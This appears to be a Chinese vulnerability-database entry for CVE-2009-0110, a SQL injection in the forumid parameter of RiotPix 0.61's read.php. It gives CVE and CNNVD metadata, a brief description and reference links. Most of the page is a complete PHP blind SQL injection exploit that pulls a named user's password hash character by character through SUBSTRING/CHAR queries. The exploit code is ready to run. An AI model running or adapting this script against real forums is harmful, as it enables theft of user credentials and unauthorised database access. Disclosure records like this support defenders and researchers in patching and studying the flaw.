RiotPix "read.php" SQL注入漏洞

QQ空间 新浪微博 微信 QQ facebook twitter
漏洞ID 1117205 漏洞类型 SQL注入
发布时间 2009-01-06 更新时间 2009-01-29
CVE编号 CVE-2009-0110 CNNVD-ID CNNVD-200901-099
漏洞平台 PHP CVSS评分 7.5
|漏洞来源
https://www.exploit-db.com/exploits/7679
https://cxsecurity.com/issue/WLB-2009010148
http://www.cnnvd.org.cn/web/xxk/ldxqById.tag?CNNVD=CNNVD-200901-099
|漏洞详情
RiotPix是一个开源,标准兼容的网络论坛系统。RiotPix0.61以及之前的版本中的read.php存在SQL注入漏洞。远程攻击者可以借助forumid参数,执行任意的SQL指令。
|漏洞EXP
<?php

/*

	$Id: riotpix-0.61.txt,v 0.1 2009/01/06 03:47:30 cOndemned Exp $

	RiotPix <= 0.61 (forumid) Blind SQL Injection Exploit
	Bug found && Exploited by cOndemned

	Download :
		
		http://www.riotpix.com/download/riotpix0_61.zip


	Description :
		
		It's just simple Blind SQL Injection exploit that gets
		password hash of given user. Code is really simple - 
		without proxy, or error handling, but i don't think it is
		important, as long as the RiotPix isn't famous script...
		
	-------------------------------------------------------------------	

	Greetz: 
	
		ZaBeaTy, str0ke, sid.psycho & TWT, wojtus0007, 0in, vCore


		"...What is left to die for, what is left to give..."

*/


	echo "\n[~] RiotPix <= 0.61 (forumid) Blind SQL Injection Exploit";
	echo "\n[~] Bug found && Exploited by cOndemned\n";

	if($argc != 4)
	{
		printf("[!] Usage: php %s <target_size> <username> <topic_id>\n\n", $argv[0]);
		exit;
	}

	list($sploit, $target, $username, $topicid) = $argv;

	$charsArr = array(48, 49, 50, 51, 52, 53, 54, 55, 56, 57, 97, 98, 99, 100, 101, 102);
	$pos = 1;

	echo "[~] Password Hash : ";

	while($pos != 33)
	{
		for($i = 0; $i <= count($charsArr); $i++)
		{
			$query = "/read.php?forumid=$topicid+AND+SUBSTRING((SELECT+password+FROM+users+WHERE+username='$username'),$pos,1)=CHAR({$charsArr[$i]})--";
			$source = file_get_contents($target . $query);
			
			if(!eregi('existent', $source))  
			{
				printf("%s", chr($charsArr[$i]));
				$pos++;
				break;
			}
			flush(STDOUT);
		}
	}

	echo "\n[~] Done\n\n";

?>

# milw0rm.com [2009-01-06]
|参考资料

来源:BID
名称:33129
链接:http://www.securityfocus.com/bid/33129
来源:MILW0RM
名称:7679
链接:http://www.milw0rm.com/exploits/7679
来源:SREASON
名称:4893
链接:http://securityreason.com/securityalert/4893
来源:SECUNIA
名称:33395
链接:http://secunia.com/advisories/33395